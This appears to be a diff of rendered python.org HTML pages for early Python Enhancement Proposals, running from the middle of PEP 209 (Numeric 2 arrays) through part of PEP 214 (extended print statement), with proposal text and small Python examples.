    Python has fewer numeric types than Numeric which can cause +coercion problems. For example, when multiplying a Python scalar +of type float and a Numeric array of type float, the Numeric array +is converted to a double, since the Python float type is actually +a double. This is often not the desired behavior, since the +Numeric array will be doubled in size which is likely to be +annoying, particularly for very large arrays. We prefer that the +array type trumps the python type for the same type class, namely +integer, float, and complex. Therefore, an operation between a +Python integer and an Int16 (short) array will return an Int16 +array. Whereas an operation between a Python float and an Int16 +array would return a Float64 (double) array. Operations between +two arrays use normal coercion rules.

    +
  6. +
  7. How is integer division handled?

    In a future version of Python, the behavior of integer division +will change. The operands will be converted to floats, so the +result will be a float. If we implement the proposed scalar +coercion rules where arrays have precedence over Python scalars, +then dividing an array by an integer will return an integer array +and will not be consistent with a future version of Python which +would return an array of type double. Scientific programmers are +familiar with the distinction between integer and floating-point +division, so should Numeric 2 continue with this behavior?

    +
  8. +
  9. How should records be implemented?

    There are two approaches to implementing records depending on your +point-of-view. The first is to divide arrays into separate +classes depending on the behavior of their types. For example, +numeric arrays are one class, strings a second, and records a +third, because the range and type of operations of each class +differ. As such, a record array is not a new type, but a +mechanism for a more flexible form of array. To easily access and +manipulate such complex data, the class is comprised of numeric +arrays having different byte offsets into the data buffer. For +example, one might have a table consisting of an array of Int16, +Real32 values. Two numeric arrays, one with an offset of 0 bytes +and a stride of 6 bytes to be interpreted as Int16, and one with an +offset of 2 bytes and a stride of 6 bytes to be interpreted as +Real32 would represent the record array. Both numeric arrays +would refer to the same data buffer, but have different offset and +stride attributes, and a different numeric type.

    +

    The second approach is to consider a record as one of many array +types, albeit with fewer, and possibly different, array operations +than for numeric arrays. This approach considers an array type to +be a mapping of a fixed-length string. The mapping can either be +simple, like integer and floating-point numbers, or complex, like +a complex number, a byte string, and a C-structure. The record +type effectively merges the struct and Numeric modules into a +multi-dimensional struct array. This approach implies certain +changes to the array interface. For example, the ‘typecode’ +keyword argument should probably be changed to the more +descriptive ‘format’ keyword.

    +
      +
    1. How are record semantics defined and implemented?

      Whichever implementation approach is taken for records, the +syntax and semantics of how they are to be accessed and +manipulated must be decided, if one wishes to have access to +sub-fields of records. In this case, the record type can +essentially be considered an inhomogeneous list, like a tuple +returned by the unpack method of the struct module; and a 1-d +array of records may be interpreted as a 2-d array with the +second dimension being the index into the list of fields. +This enhanced array semantics makes access to an array of one +or more of the fields easy and straightforward. It also +allows a user to do array operations on a field in a natural +and intuitive way. If we assume that records are implemented +as an array type, then the last dimension defaults to 0 and can +therefore be neglected for arrays comprised of simple types, +like numeric.

      +
    2. +
    +
  10. +
  11. How are masked-arrays implemented?

    Masked-arrays in Numeric 1 are implemented as a separate array +class. With the ability to add new array types to Numeric 2, it +is possible that masked-arrays in Numeric 2 could be implemented +as a new array type instead of an array class.

    +
  12. +
  13. How are numerical errors handled (IEEE floating-point errors in +particular)?

    It is not clear to the proposers (Paul Barrett and Travis +Oliphant) what is the best or preferred way of handling errors. +Most of the C functions that perform the operation iterate over +the inner-most (last) dimension of the array. This dimension +could contain a thousand or more items having one or more errors +of differing type, such as divide-by-zero, underflow, and +overflow. Additionally, keeping track of these errors may come at +the expense of performance. Therefore, we suggest several +options:

    +
      +
    1. Print a message of the most severe error, leaving it to +the user to locate the errors.
    2. +
    3. Print a message of all errors that occurred and the number +of occurrences, leaving it to the user to locate the errors.
    4. +
    5. Print a message of all errors that occurred and a list of +where they occurred.
    6. +
    7. Or use a hybrid approach, printing only the most severe +error, yet keeping track of what and where the errors +occurred. This would allow the user to locate the errors +while keeping the error message brief.
    8. +
    +
  14. +
  15. What features are needed to ease the integration of FORTRAN +libraries and code?
  16. +
+

It would be a good idea at this stage to consider how to ease the +integration of FORTRAN libraries and user code in Numeric 2.
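
+
As promised in open issue 1, here is a toy sketch of the copy-on-write idea discussed there; COWArray and its shared reference count are illustrative only, since real Numeric buffers live at the C level:

+
class COWArray:
+    def __init__(self, data, refs=None):
+        self.data = data                   # a list stands in for the buffer
+        self.refs = refs or [1]            # count of arrays sharing the buffer
+    def copy(self):
+        self.refs[0] = self.refs[0] + 1    # share the buffer, copy nothing yet
+        return COWArray(self.data, self.refs)
+    def __setitem__(self, i, value):
+        if self.refs[0] > 1:               # buffer is shared: copy on write
+            self.refs[0] = self.refs[0] - 1
+            self.data = list(self.data)
+            self.refs = [1]
+        self.data[i] = value
+
+a = COWArray([1, 2, 3])
+b = a.copy()                               # nothing copied here
+b[0] = 99                                  # the copy happens now
+print a.data, b.data                       # -> [1, 2, 3] [99, 2, 3]
+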

+
+
+

Implementation Steps

+
    +
  1. Implement basic UFunc capability
      +
    1. Minimal Array class:

      Necessary class attributes and methods, e.g. .shape, .data, +.type, etc.

      +
    2. +
    3. Minimal ArrayType class:

      Int32, Real64, Complex64, Char, Object

      +
    4. +
    5. Minimal UFunc class:

      UFunc instantiation, CFunction registration, UFunc call for +1-D arrays including the rules for doing alignment, +byte-swapping, and coercion.

      +
    6. +
    7. Minimal C-extension module:

      _UFunc, which does the innermost array loop in C.

      +

      This step implements whatever is needed to do: ‘c = add(a, b)’ +where a, b, and c are 1-D arrays. It teaches us how to add +new UFuncs, to coerce the arrays, to pass the necessary +information to a C iterator method and to do the actual +computation.

      +
    8. +
    +
  2. +
  3. Continue enhancing the UFunc iterator and Array class
      +
    1. Implement some access methods for the Array class: +print, repr, getitem, setitem, etc.
    2. +
    3. Implement multidimensional arrays
    4. +
    5. Implement some of the basic Array methods using UFuncs: ++, -, *, /, etc.
    6. +
    7. Enable UFuncs to use Python sequences.
    8. +
    +
  4. +
  5. Complete the standard UFunc and Array class behavior
      +
    1. Implement getslice and setslice behavior
    2. +
    3. Work on Array broadcasting rules
    4. +
    5. Implement Record type
    6. +
    +
  6. +
  7. Add additional functionality
      +
    1. Add more UFuncs
    2. +
    3. Implement buffer or mmap access
    4. +
    +
  8. +
+
+
+

Incompatibilities

+

The following is a list of incompatibilities in behavior between +Numeric 1 and Numeric 2.

+
    +
  1. Scalar coercion rules

    Numeric 1 has a single set of coercion rules for array and Python +numeric types. This can cause unexpected and annoying problems +during the calculation of an array expression. Numeric 2 intends +to overcome these problems by having two sets of coercion rules: +one for arrays and Python numeric types, and another just for +arrays.

    +
  2. +
  3. No savespace attribute

    The savespace attribute in Numeric 1 makes arrays with this +attribute set take precedence over those that do not have it set. +Numeric 2 will not have such an attribute and therefore normal +array coercion rules will be in effect.

    +
  4. +
  5. Slicing syntax returns a copy

    The slicing syntax in Numeric 1 returns a view into the original +array. The slicing behavior for Numeric 2 will be a copy. You +should use the ArrayView class to get a view into an array.

    +
  6. +
  7. Boolean comparisons return a boolean array

    A comparison between arrays in Numeric 1 results in a Boolean +scalar, because of current limitations in Python. The advent of +Rich Comparisons in Python 2.1 will allow an array of Booleans to +be returned.

    +
  8. +
  9. Type characters are deprecated

    Numeric 2 will have an ArrayType class composed of Type instances, +for example Int8, Int16, Int32, and Int for signed integers. The +typecode scheme in Numeric 1 will be available for backward +compatibility, but will be deprecated.

    +
  10. +
+
+
+

Appendices

+
    +
  1. Implicit sub-arrays iteration

    A computer animation is composed of a number of 2-D images or +frames of identical shape. By stacking these images into a single +block of memory, a 3-D array is created. Yet the operations to be +performed are not meant for the entire 3-D array, but on the set +of 2-D sub-arrays. In most array languages, each frame has to be +extracted, operated on, and then reinserted into the output array +using a for-like loop. The J language allows the programmer to +perform such operations implicitly by having a rank for the frame +and array. By default these ranks will be the same during the +creation of the array. It was the intention of the Numeric 1 +developers to implement this feature, since it is based on the +language J. The Numeric 1 code has the required variables for +implementing this behavior, but the behavior was never implemented. +We intend to implement implicit sub-array iteration in Numeric 2, if the +array broadcasting rules found in Numeric 1 do not fully support +this behavior.

    +
  2. +
+
+ + +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0209.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0210/index.html b/pep-0210/index.html new file mode 100644 index 00000000000..684746839ac --- /dev/null +++ b/pep-0210/index.html @@ -0,0 +1,122 @@
PEP 210 – Decoupling the Interpreter Loop | peps.python.org
+
+


+ + +
+ + +
+ \ No newline at end of file
diff --git a/pep-0211/index.html b/pep-0211/index.html new file mode 100644 index 00000000000..b980ce0b659 --- /dev/null +++ b/pep-0211/index.html @@ -0,0 +1,306 @@
PEP 211 – Adding A New Outer Product Operator | peps.python.org
+
+


+ + +
+
+
+

PEP 211 – Adding A New Outer Product Operator

+
+
Author:
+
Greg Wilson <gvwilson at ddj.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
15-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Warning

+

This PEP has been rejected.

+


+

The approach in the later PEP 465 was eventually accepted +in lieu of this PEP. The Rejected Ideas section +of that PEP explains the rationale in more detail.

+

+
+
+

Introduction

+

This PEP describes a proposal to define @ (pronounced “across”) +as a new outer product operator in Python 2.2. When applied to +sequences (or other iterable objects), this operator will combine +their iterators, so that:

+
for (i, j) in S @ T:
+    pass
+
+
+

will be equivalent to:

+
for i in S:
+    for j in T:
+        pass
+
+
+

Classes will be able to overload this operator using the special +methods __across__, __racross__, and __iacross__. In +particular, the new Numeric module (PEP 209) will overload this +operator for multi-dimensional arrays to implement matrix +multiplication.

+
+
+

Background

+

Number-crunching is now just a small part of computing, but many +programmers — including many Python users — still need to +express complex mathematical operations in code. Most numerical +languages, such as APL, Fortran-90, MATLAB, IDL, and Mathematica, +therefore provide two forms of the common arithmetic operators. +One form works element-by-element, e.g. multiplies corresponding +elements of its matrix arguments. The other implements the +“mathematical” definition of that operation, e.g. performs +row-column matrix multiplication.

+

Zhu and Lielens have proposed doubling up Python’s operators in +this way. Their proposal would create six new binary infix +operators, and six new in-place operators.

+

The original version of this proposal was much more conservative. +The author consulted the developers of GNU Octave [1], an open +source clone of MATLAB. Its developers agreed that providing an +infix operator for matrix multiplication was important: numerical +programmers really do care whether they have to write mmul(A,B) +instead of A op B.

+

On the other hand, when asked how important it was to have infix +operators for matrix solution and other operations, Prof. James +Rawlings replied [2]:

+
+
I DON’T think it’s a must have, and I do a lot of matrix +inversion. I cannot remember if it’s A\b or b\A so I always +write inv(A)*b instead. I recommend dropping \.
+

Based on this discussion, and feedback from students at the US +national laboratories and elsewhere, we recommended adding only +one new operator, for matrix multiplication, to Python.

+
+
+

Iterators

+

The planned addition of iterators to Python 2.2 opens up a broader +scope for this proposal. As part of the discussion of PEP 201, +Lockstep Iteration, the author of this proposal conducted an +informal usability experiment [3]. The results showed that users +are psychologically receptive to “cross-product” loop syntax. For +example, most users expected:

+
S = [10, 20, 30]
+T = [1, 2, 3]
+for x in S; y in T:
+    print x+y,
+
+
+

to print 11 12 13 21 22 23 31 32 33. We believe that users will +have the same reaction to:

+
for (x, y) in S @ T:
+    print x+y
+
+
+

i.e. that they will naturally interpret this as a tidy way to +write loop nests.

+

This is where iterators come in. Actually constructing the +cross-product of two (or more) sequences before executing the loop +would be very expensive. On the other hand, @ could be defined +to get its arguments’ iterators, and then create an outer iterator +which returns tuples of the values returned by the inner +iterators.
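
+
With the generators that arrived alongside iterators in Python 2.2, such an outer iterator could be sketched as follows; across() is an invented name standing in for the proposed @:

+
def across(*sequences):
+    # lazily yields tuples from the cross-product; the trailing
+    # sequences are re-iterated, so they must be restartable
+    # (compare point 3 of the Discussion below)
+    if not sequences:
+        yield ()
+        return
+    head, rest = sequences[0], sequences[1:]
+    for item in head:
+        for tail in across(*rest):
+            yield (item,) + tail
+
+for (i, j) in across([10, 20, 30], [1, 2, 3]):
+    print i + j,                           # -> 11 12 13 21 22 23 31 32 33
+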

+
+
+

Discussion

+
    +
  1. Adding a named function “across” would have less impact on +Python than a new infix operator. However, this would not make +Python more appealing to numerical programmers, who really do +care whether they can write matrix multiplication using an +operator, or whether they have to write it as a function call.
  2. +
  3. @ would have to be chainable in the same way as comparison +operators, i.e.:
    (1, 2) @ (3, 4) @ (5, 6)
    +
    +
    +

    would have to return (1, 3, 5) ... (2, 4, 6), and not +((1, 3), 5) ... ((2, 4), 6). This should not require special +support from the parser, as the outer iterator created by the +first @ could easily be taught how to combine itself with +ordinary iterators.

    +
  4. +
  5. There would have to be some way to distinguish restartable +iterators from ones that couldn’t be restarted. For example, +if S is an input stream (e.g. a file), and L is a list, then S +@ L is straightforward, but L @ S is not, since iteration +through the stream cannot be repeated. This could be treated +as an error, or by having the outer iterator detect +non-restartable inner iterators and cache their values.
  6. +
  7. Whiteboard testing of this proposal in front of three novice +Python users (all of them experienced programmers) indicates +that users will expect:
    "ab" @ "cd"
    +
    +
    +

    to return four strings, not four tuples of pairs of +characters. Opinion was divided on what:

    +
    ("a", "b") @ "cd"
    +
    +
    +

    ought to return…

    +
  8. +
+
+
+

Alternatives

+
    +
  1. Do nothing — keep Python simple.

    This is always the default choice.

    +
  2. +
  3. Add a named function instead of an operator.

    Python is not primarily a numerical language; it may not be worth +complexifying it for this special case. However, support for real +matrix multiplication is frequently requested, and the proposed +semantics for @ for built-in sequence types would simplify +expression of a very common idiom (nested loops).

    +
  4. +
  5. Introduce prefixed forms of all existing operators, such as +~* and ~+, as proposed in PEP 225.

    Our objections to this are that there isn’t enough demand to +justify the additional complexity (see Rawlings’ comments [2]), +and that the proposed syntax fails the “low toner” readability +test.

    +
  6. +
+
+
+

Acknowledgments

+

I am grateful to Huaiyu Zhu for initiating this discussion, and to +James Rawlings and students in various Python courses for their +discussions of what numerical programmers really care about.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0211.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0212/index.html b/pep-0212/index.html new file mode 100644 index 00000000000..d59c618ec36 --- /dev/null +++ b/pep-0212/index.html @@ -0,0 +1,303 @@
PEP 212 – Loop Counter Iteration | peps.python.org
+
+


+ + +
+
+
+

PEP 212 – Loop Counter Iteration

+
+
Author:
+
Peter Schneider-Kamp <nowonder at nowonder.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Rejection Notice

+

This PEP has been rejected. enumerate(), introduced in PEP 279, +covers the use-case proposed in this PEP, and the PEP author has been +unreachable.

+
+
+

Introduction

+

This PEP describes the often proposed feature of exposing the loop +counter in for-loops. This PEP tracks the status and ownership of +this feature. It contains a description of the feature and +outlines changes necessary to support the feature. This PEP +summarizes discussions held in mailing list forums, and provides +URLs for further information, where appropriate. The CVS revision +history of this file contains the definitive historical record.

+
+
+

Motivation

+

Standard for-loops in Python iterate over the elements of a +sequence [1]. Often it is desirable to loop over the indices or +both the elements and the indices instead.

+

The common idioms used to accomplish this are unintuitive. This +PEP proposes two different ways of exposing the indices.

+
+
+

Loop counter iteration

+

The current idiom for looping over the indices makes use of the +built-in range function:

+
for i in range(len(sequence)):
+    # work with index i
+
+
+

Looping over both elements and indices can be achieved either by the +old idiom or by using the new zip built-in function [2]:

+
for i in range(len(sequence)):
+    e = sequence[i]
+    # work with index i and element e
+
+
+

or:

+
for i, e in zip(range(len(sequence)), sequence):
+   # work with index i and element e
+
+
+
+
+

The Proposed Solutions

+

There are three solutions that have been discussed. One adds a +non-reserved keyword, another adds two built-in functions, and +a third adds methods to sequence objects.

+
+
+

Non-reserved keyword indexing

+

This solution would extend the syntax of the for-loop by adding +an optional <variable> indexing clause which can also be used +instead of the <variable> in clause.

+

Looping over the indices of a sequence would thus become:

+
for i indexing sequence:
+    # work with index i
+
+
+

Looping over both indices and elements would similarly be:

+
for i indexing e in sequence:
+    # work with index i and element e
+
+
+
+
+

Built-in functions indices and irange

+

This solution adds two built-in functions indices and irange. +The semantics of these can be described as follows:

+
def indices(sequence):
+    return range(len(sequence))
+
+def irange(sequence):
+    return zip(range(len(sequence)), sequence)
+
+
+

These functions could be implemented either eagerly or lazily and +should be easy to extend in order to accept more than one sequence +argument.
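
+
One possible eager extension to several sequence arguments, letting the shortest argument win as zip() does, might be:

+
def indices(*sequences):
+    return range(min(map(len, sequences)))
+
+def irange(*sequences):
+    return zip(indices(*sequences), *sequences)
+
+print indices([7, 8, 9], 'ab')             # -> [0, 1]
+print irange('abc')                        # -> [(0, 'a'), (1, 'b'), (2, 'c')]
+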

+

The use of these functions would simplify the idioms for looping +over the indices and over both elements and indices:

+
for i in indices(sequence):
+    # work with index i
+
+for i, e in irange(sequence):
+    # work with index i and element e
+
+
+
+
+

Methods for sequence objects

+

This solution proposes the addition of indices, items +and values methods to sequences, which enable looping over +indices only, both indices and elements, and elements only +respectively.

+

This would immensely simplify the idioms for looping over indices +and for looping over both elements and indices:

+
for i in sequence.indices():
+    # work with index i
+
+for i, e in sequence.items():
+    # work with index i and element e
+
+
+

Additionally it would allow looping over the elements +of sequences and dictionaries in a consistent way:

+
for e in sequence_or_dict.values():
+    # do something with element e
+
+
+
+
+

Implementations

+

For all three solutions, more or less rough patches exist +at SourceForge:

+
    +
  • for i indexing a in l: exposing the for-loop counter [3]
  • +
  • add indices() and irange() to built-ins [4]
  • +
  • add items() method to listobject [5]
  • +
+

All of them have been pronounced on and rejected by the BDFL.

+

Note that the indexing keyword is only a NAME in the +grammar and so does not hinder the general use of indexing.

+
+
+

Backward Compatibility Issues

+

As no keywords are added and the semantics of existing code +remains unchanged, all three solutions can be implemented +without breaking existing code.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0212.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0213/index.html b/pep-0213/index.html new file mode 100644 index 00000000000..2a3ebfc8783 --- /dev/null +++ b/pep-0213/index.html @@ -0,0 +1,352 @@
PEP 213 – Attribute Access Handlers | peps.python.org
+
+


+ + +
+
+
+

PEP 213 – Attribute Access Handlers

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
21-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

It is possible (and even relatively common) in Python code and +in extension modules to “trap” when an instance’s client code +attempts to set an attribute and execute code instead. In other +words, it is possible to allow users to use attribute assignment/ +retrieval/deletion syntax even though the underlying implementation +is doing some computation rather than directly modifying a +binding.

+

This PEP describes a feature that makes it easier, more efficient +and safer to implement these handlers for Python instances.

+
+
+

Justification

+
+

Scenario 1

+

You have a deployed class that works on an attribute named +“stdout”. After a while, you think it would be better to +check that stdout is really an object with a “write” method +at the moment of assignment. Rather than change to a +setstdout method (which would be incompatible with deployed +code) you would rather trap the assignment and check the +object’s type.

+
+
+

Scenario 2

+

You want to be as compatible as possible with an object +model that has a concept of attribute assignment. It could +be the W3C Document Object Model or a particular COM +interface (e.g. the PowerPoint interface). In that case +you may well want attributes in the model to show up as +attributes in the Python interface, even though the +underlying implementation may not use attributes at all.

+
+
+

Scenario 3

+

A user wants to make an attribute read-only.

+

In short, this feature allows programmers to separate the +interface of their module from the underlying implementation +for whatever purpose. Again, this is not a new feature but +merely a new syntax for an existing convention.

+
+
+
+

Current Solution

+

To make some attributes read-only:

+
class foo:
+    def __setattr__( self, name, val ):
+        if name=="readonlyattr":
+            raise TypeError
+        elif name=="readonlyattr2":
+            raise TypeError
+        # ... more read-only attributes ...
+        else:
+            self.__dict__[name]=val
+
+
+

This has the following problems:

+
    +
  1. The creator of the method must be intimately aware of whether +somewhere else in the class hierarchy __setattr__ has also been +trapped for any particular purpose. If so, she must specifically +call that method rather than assigning to the dictionary. There +are many different reasons to overload __setattr__ so there is a +decent potential for clashes. For instance object database +implementations often overload setattr for an entirely unrelated +purpose.
  2. +
  3. The string-based switch statement forces all attribute handlers +to be specified in one place in the code. They may then dispatch +to task-specific methods (for modularity) but this could cause +performance problems.
  4. +
  5. Logic for the setting, getting and deleting must live in +__getattr__, __setattr__ and __delattr__. Once again, this can +be mitigated through an extra level of method call but this is +inefficient.
  6. +
+
+
+

Proposed Syntax

+

Special methods should declare themselves with declarations of the +following form:

+
class x:
+    def __attr_XXX__(self, op, val ):
+        if op=="get":
+            return someComputedValue(self.internal)
+        elif op=="set":
+            self.internal=someComputedValue(val)
+        elif op=="del":
+            del self.internal
+
+
+

Client code looks like this:

+
fooval=x.foo
+x.foo=fooval+5
+del x.foo
+
+
+
+
+

Semantics

+

Attribute references of all three kinds should call the method. +The op parameter can be “get”/”set”/”del”. Of course this string +will be interned so the actual checks for the string will be +very fast.
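
+
Under this proposal the stdout check of Scenario 1 would have been written roughly as below. Defining such a method is ordinary Python, but since the proposal was deferred nothing actually routes attribute access through it; Process is an invented example class:

+
class Process:
+    def __attr_stdout__(self, op, val):
+        if op == 'set':
+            if not hasattr(val, 'write'):
+                raise TypeError('stdout must have a write method')
+            self.__stdout = val            # private storage, per the Caveats
+        elif op == 'get':
+            return self.__stdout
+        elif op == 'del':
+            del self.__stdout
+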

+

It is disallowed to actually have an attribute named XXX in the +same instance as a method named __attr_XXX__.

+

An implementation of __attr_XXX__ takes precedence over an +implementation of __getattr__ based on the principle that +__getattr__ is supposed to be invoked only after finding an +appropriate attribute has failed.

+

An implementation of __attr_XXX__ takes precedence over an +implementation of __setattr__ in order to be consistent. The +opposite choice seems fairly feasible also, however. The same +goes for __del_y__.

+
+
+

Proposed Implementation

+

There is a new object type called an attribute access handler. +Objects of this type have the following attributes:

+
name (e.g. XXX, not __attr_XXX__)
+method (pointer to a method object)
+
+
+

In PyClass_New, methods of the appropriate form will be detected and +converted into objects (just like unbound method objects). These are +stored in the class __dict__ under the name XXX. The original method +is stored as an unbound method under its original name.

+

If there are any attribute access handlers in an instance at all, +a flag is set. Let’s call it “I_have_computed_attributes” for +now. Derived classes inherit the flag from base classes. Instances +inherit the flag from classes.

+

A get proceeds as usual until just before the object is returned. +In addition to the current check whether the returned object is a +method it would also check whether a returned object is an access +handler. If so, it would invoke the getter method and return +the value. To remove an attribute access handler you could directly +fiddle with the dictionary.

+

A set proceeds by checking the “I_have_computed_attributes” flag. If +it is not set, everything proceeds as it does today. If it is set +then we must do a dictionary get on the requested object name. If it +returns an attribute access handler then we call the setter function +with the value. If it returns any other object then we discard the +result and continue as we do today. Note that having an attribute +access handler will mildly affect attribute “setting” performance for +all sets on a particular instance, but no more so than today, using +__setattr__. Gets are more efficient than they are today with +__getattr__.

+

The I_have_computed_attributes flag is intended to eliminate the +performance degradation of an extra “get” per “set” for objects not +using this feature. Checking this flag should have minuscule +performance implications for all objects.

+

The implementation of delete is analogous to the implementation +of set.

+
+
+

Caveats

+
    +
  1. You might note that I have not proposed any logic to keep +the I_have_computed_attributes flag up to date as attributes +are added and removed from the instance’s dictionary. This is +consistent with current Python. If you add a __setattr__ method +to an object after it is in use, that method will not behave as +it would if it were available at “compile” time. The dynamism is +arguably not worth the extra implementation effort. This snippet +demonstrates the current behavior:
    >>> def prn(*args):print args
+>>> class a:
+...    __setattr__=prn
    +>>> a().foo=5
    +(<__main__.a instance at 882890>, 'foo', 5)
    +
    +>>> class b: pass
    +>>> bi=b()
    +>>> bi.__setattr__=prn
+>>> bi.foo=5
    +
    +
    +
  2. Assignment to __dict__[“XXX”] can overwrite the attribute access handler for __attr_XXX__. Typically the access handlers will store information away in private __XXX variables.
  3. An attribute access handler that attempts to call setattr or getattr on the object itself can cause an infinite loop (as with __getattr__). Once again, the solution is to use a special (typically private) variable such as __XXX; a sketch follows this list.
+
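The following sketch illustrates caveat 3 under the proposed protocol (illustrative code, not from the PEP; the class names are invented):

class Looping:
    def __attr_foo__(self, op, val=None):
        if op == "get":
            return self.foo    # looks up foo, re-invoking this handler: infinite loop

class Safe:
    def __attr_foo__(self, op, val=None):
        if op == "get":
            return self.__foo  # private variable has no handler: safe
        elif op == "set":
            self.__foo = val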
+
+

Note

+

The descriptor mechanism described in PEP 252 is powerful enough +to support this more directly. A ‘getset’ constructor may be +added to the language making this possible:

+
class C:
+    def get_x(self):
+        return self.__x
+    def set_x(self, v):
+        self.__x = v
+    x = getset(get_x, set_x)
+
+
+

Additional syntactic sugar might be added, or a naming convention +could be recognized.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0213.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0214/index.html b/pep-0214/index.html
new file mode 100644
index 00000000000..7f74b4b78ba
--- /dev/null
+++ b/pep-0214/index.html
@@ -0,0 +1,470 @@
+PEP 214 – Extended Print Statement | peps.python.org
+
+

+
+
+

PEP 214 – Extended Print Statement

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
16-Aug-2000
+
+
+
+
+
+

Introduction

+

This PEP describes a syntax to extend the standard ‘print’ +statement so that it can be used to print to any file-like object, +instead of the default sys.stdout. This PEP tracks the status and +ownership of this feature. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

Proposal

+

This proposal introduces a syntax extension to the print +statement, which allows the programmer to optionally specify the +output file target. An example usage is as follows:

+
print >> mylogfile, 'this message goes to my log file'
+
+
+

Formally, the syntax of the extended print statement is:

+
print_stmt: ... | '>>' test [ (',' test)+ [','] ]
+
+
+

where the ellipsis indicates the original print_stmt syntax +unchanged. In the extended form, the expression just after >> +must yield an object with a write() method (i.e. a file-like +object). Thus these two statements are equivalent:

+
print 'hello world'
+print >> sys.stdout, 'hello world'
+
+
+

As are these two statements:

+
print
+print >> sys.stdout
+
+
+

These two statements are syntax errors:

+
print ,
+print >> sys.stdout,
+
+
+
+
+

Justification

+

‘print’ is a Python keyword and introduces the print statement as +described in section 6.6 of the language reference manual [1]. +The print statement has a number of features:

+
    +
  • it auto-converts the items to strings
  • it inserts spaces between items automatically
  • it appends a newline unless the statement ends in a comma
+

The formatting that the print statement performs is limited; for +more control over the output, a combination of sys.stdout.write(), +and string interpolation can be used.

+

The print statement by definition outputs to sys.stdout. More +specifically, sys.stdout must be a file-like object with a write() +method, but it can be rebound to redirect output to files other +than specifically standard output. A typical idiom is:

+
save_stdout = sys.stdout
+try:
+    sys.stdout = mylogfile
+    print 'this message goes to my log file'
+finally:
+    sys.stdout = save_stdout
+
+
+

The problem with this approach is that the binding is global, and +so affects every statement inside the try: clause. For example, +if we added a call to a function that actually did want to print +to stdout, this output too would get redirected to the logfile.

+

This approach is also very inconvenient for interleaving prints to +various output streams, and complicates coding in the face of +legitimate try/except or try/finally clauses.

+
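With the extended statement, interleaving streams requires no rebinding at all. For example (mylogfile as in the earlier snippet):

print 'progress message'                  # goes to sys.stdout
print >> mylogfile, 'detail for the log'  # goes to the log file
print 'another progress message'          # stdout again; nothing to restore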
+
+

Reference Implementation

+

A reference implementation, in the form of a patch against the +Python 2.0 source tree, is available on SourceForge’s patch +manager [2]. This approach adds two new opcodes, PRINT_ITEM_TO and +PRINT_NEWLINE_TO, which simply pop the file-like object off the +top of the stack and use it instead of sys.stdout as the output +stream.

+

(This reference implementation has been adopted in Python 2.0.)

+
+
+

Alternative Approaches

+

An alternative to this syntax change has been proposed (originally +by Moshe Zadka) which requires no syntax changes to Python. A +writeln() function could be provided (possibly as a builtin), that +would act much like extended print, with a few additional +features:

+
def writeln(*args, **kws):
+    import sys
+    file = sys.stdout
+    sep = ' '
+    end = '\n'
+    if kws.has_key('file'):
+        file = kws['file']
+        del kws['file']
+    if kws.has_key('nl'):
+        if not kws['nl']:
+            end = ' '
+        del kws['nl']
+    if kws.has_key('sep'):
+        sep = kws['sep']
+        del kws['sep']
+    if kws:
+        raise TypeError('unexpected keywords')
+    file.write(sep.join(map(str, args)) + end)
+
+
+

writeln() takes three optional keyword arguments. In the +context of this proposal, the relevant argument is ‘file’ which +can be set to a file-like object with a write() method. Thus:

+
print >> mylogfile, 'this goes to my log file'
+
+
+

would be written as:

+
writeln('this goes to my log file', file=mylogfile)
+
+
+

writeln() has the additional functionality that the keyword +argument ‘nl’ is a flag specifying whether to append a newline or +not, and an argument ‘sep’ which specifies the separator to output +in between each item.

+
+
+

More Justification by the BDFL

+

The proposal has been challenged on the newsgroup. One series of +challenges doesn’t like ‘>>’ and would rather see some other +symbol.

+
    +
  • Challenge: Why not one of these?
    print in stderr items,....
    +print + stderr items,.......
    +print[stderr] items,.....
    +print to stderr items,.....
    +
    +
    +

    Response: If we want to use a special symbol (print <symbol> +expression), the Python parser requires that it is not already a +symbol that can start an expression – otherwise it can’t decide +which form of print statement is used. (The Python parser is a +simple LL(1) or recursive descent parser.)

    +

This means that we can’t use the “keyword only in context trick” +that was used for “import as”, because an identifier can start an +expression. This rules out +stderr, [stderr], and to stderr. It +leaves us with binary operator symbols and other miscellaneous +symbols that are currently illegal here, such as ‘import’.

    +

    If I had to choose between ‘print in file’ and ‘print >> file’ I +would definitely choose ‘>>’. In part because ‘in’ would be a new +invention (I know of no other language that uses it, while ‘>>’ is +used in sh, awk, Perl, and C++), in part because ‘>>’, being +non-alphabetic, stands out more so is more likely to catch the +reader’s attention.

    +
  • Challenge: Why does there have to be a comma between the file and +the rest?

Response: The comma separating the file from the following expression is +necessary! Of course you want the file to be an arbitrary +expression, not just a single word. (You definitely want to be +able to write print >>sys.stderr.) Without the comma, the +parser wouldn’t be able to distinguish where the file expression ends +and where the next one begins, e.g.

    +
    print >>i +1, 2
    +print >>a [1], 2
    +print >>f (1), 2
    +
    +
    +
  • Challenge: Why do you need a syntax extension? Why not +writeln(file, item, …)?

